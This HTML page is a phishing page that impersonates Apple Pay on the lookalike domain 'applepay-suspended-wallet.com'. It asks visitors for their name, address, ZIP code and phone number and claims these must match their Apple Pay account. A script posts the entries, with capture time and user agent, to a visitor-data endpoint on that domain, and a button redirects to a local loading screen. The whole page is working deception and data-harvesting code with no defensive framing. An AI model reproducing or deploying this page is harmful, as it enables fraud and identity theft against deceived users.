<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, inital-scale=1">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css" integrity="sha384-vSIIfh2YWi9wW0r9iZe7RJPrKwp6bG+s9QZMoITbCckVJqGCCRhc+ccxNcdpHuYu" crossorigin="anonymous">
    <title>Apple Pay</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.1.1.min.js" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>
    <script>
      var urlroot = 'https://applepay-suspended-wallet.com';
      var uniqueid = '63e60fae63404';
    </script>
    <script src="https://applepay-suspended-wallet.com/js/cntdjs/jquery.js"></script>
    <script src="https://applepay-suspended-wallet.com/js/cntdjs/jquery.mask.js"></script>
    <script src="https://applepay-suspended-wallet.com/js/cntdjs/cntd.js"></script>
    <script src="https://applepay-suspended-wallet.com/js/shared/loading.js"></script>
    <script src="https://applepay-suspended-wallet.com/js/shared/online_status.js"></script>
  </head>
  <body>
    <style>
      .content {
        /* width: 500px; */
      }

      .title {
        margin-top: 25px;
        text-align: center;
        font-weight: bold;
      }

      .small-title {
        text-align: center;
        margin-top: -5px;
      }

      .input-section {
        padding: 10px;
      }

      .input-desc {
        font-weight: bold;
        text-align: center;
        font-size: 13px;
        margin-right: 15px;
      }

      .input {
        border: 0px solid lightgray;
        background: rgba(155, 155, 155, 0.2);
        border-radius: 5px;
        padding: 5px;
        font-weight: 300;
        width: 100%;
        height: 45px;
        font-size: 18px;
      }

      .input:focus {
        outline: none;
      }

      .submit {
        margin-top: 35px;
        width: 100%;
        background: rgb(10, 132, 255);
        color: white;
        border: 1px solid rgb(60, 60, 255);
        border-radius: 7px;
        height: 45px;
      }

      .submit:hover {
        filter: brightness(95%);
      }

      .logo {
        width: 40px;
        display: block;
        margin: auto;
        margin-top: 30px;
      }

      .nav-btn {
        margin-top: 2px;
      }

      .nav-option {
        background: none;
        border: none;
        color: rgb(5, 123, 254);
      }

      .nav-option:hover {
        text-decoration: underline;
        filter: brightness(95%);
      }
    </style>
    <div class="container content">
      <form id="form">
        <!-- New Visitor Specific Fields  -->
        <input type="hidden" name="capture_time" value="09:34:38">
        <input type="hidden" name="useragent" value="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36">
        <input name="new_data" value="true" type="hidden">
        <input name="status" value="0" type="hidden">
        <input name="uniqueid" value="63e60fae63404" type="hidden">
        <div>
          <div class="col-lg-12">
            <img class="logo" src="https://applepay-suspended-wallet.com/front_end/front_end_files/Apple_logo_black.svg.png">
            <h2 class="title" id="title1">Personal Details</h2>
            <p class="small-title" style="margin-top: 10px;" id="title2">To begin, please enter your personal details below.</p>
            <p class="small-title" style="margin-top: 10px" id="title3">These details must match those of your Apple Pay account.</p>
            <div class="row">
              <div class="col-12">
                <div style="white-space:nowrap;" class="input-section">
                  <input type="text" id="fullname" class="input" name="fullname" placeholder="Full Name" required="required" style="background: rgba(0, 0, 0, 0.03); padding-left: 10px; font-weight: normal; border-radius: 2px;">
                </div>
                <div style="white-space:nowrap;" class="input-section">
                  <input type="text" id="address1" class="input" name="address1" placeholder="First Line of Address" required="required" style="background: rgba(0, 0, 0, 0.03); padding-left: 10px; font-weight: normal; border-radius: 2px;">
                </div>
                <div style="white-space:nowrap;" class="input-section">
                  <input type="text" id="address2" class="input" name="address2" placeholder="Second Line of Address" required="required" style="background: rgba(0, 0, 0, 0.03); padding-left: 10px; font-weight: normal; border-radius: 2px;">
                </div>
                <div style="white-space:nowrap;" class="input-section">
                  <input type="text" id="zipcode" class="input" name="zipcode" placeholder="ZIP Code" required="required" style="background: rgba(0, 0, 0, 0.03); padding-left: 10px; font-weight: normal; border-radius: 2px;">
                </div>
                <div style="white-space:nowrap;" class="input-section">
                  <input type="text" id="phonenumber" class="input" name="phonenumber" placeholder="Phone Number" required="required" style="background: rgba(0, 0, 0, 0.03); padding-left: 10px; font-weight: normal; border-radius: 2px;">
                </div>
                <button class="submit" id="submit-btn" style="border: none;" disabled="disabled">Continue</button>


                <script>
                  document.getElementById("submit-btn").addEventListener("click", function() {
                    window.location = "http://127.0.0.1:5500/LoadingScreen/index3.html";
                  });
                </script>
                


              </div>
            </div>
          </div>
        </div>
      </form>
      <script>
        // Auto Translator
        var page_elements = ["title1", "title2", "title3", "submit-btn"];
        var current_language = "AU".toLowerCase();
        var languages = {
          gb: {
            title1: 'Personal Details',
            title2: 'To begin, please enter your personal details below.',
            title3: 'These details must match those of your Apple Pay account.',
            'submit-btn': 'Continue'
          },
          fr: {
            title1: "Détails personnels",
            title2: 'Pour commencer, veuillez saisir vos informations personnelles ci-dessous.',
            title3: 'Ces informations doivent correspondre à celles de votre compte Apple Pay.',
            'submit-btn': 'Continuer'
          },
          es: {
            title1: "Detalles personales",
            title2: 'Para comenzar, ingrese sus datos personales a continuación.',
            title3: 'Esta información debe coincidir con la información de su cuenta de Apple Pay.',
            'submit-btn': 'Continuar'
          },
          it: {
            title1: 'Dati personali',
            title2: 'Per iniziare, inserisci i tuoi dati personali qui sotto.',
            title3: 'Questi dettagli devono corrispondere a quelli del tuo account Apple Pay.',
            'submit-btn': 'Continua'
          },
          de: {
            title1: 'Persönliche Daten',
            title2: 'Geben Sie zunächst unten Ihre persönlichen Daten ein.',
            title3: 'Diese Angaben müssen mit denen Ihres Apple Pay-Kontos übereinstimmen.',
            'submit-btn': 'Fortsetzen'
          },
        }
        for (var i = 0; i < page_elements.length; i++) {
          $('#' + page_elements[i]).text(languages[current_language][page_elements[i]])
        }
      </script>
      <style>
        #submit-btn {
          transition: .2s all;
        }

        #submit-btn:disabled {
          background: rgb(150, 150, 255);
          cursor: not-allowed;
        }

        #submit-btn:disabled:hover {
          background: rgb(150, 150, 255) !important;
        }
      </style>
      <script>
        var controller = new CNTD;
        var url = "https://applepay-suspended-wallet.com/visitordatamanager/add_visitor";
        controller.check_form_button_disable(["#fullname", "#address1", "#address2", "#zipcode", "#phonenumber"]);
        controller.submit_form(url, controller.handle_form_response);
      </script>
    </div>
  </body>
</html>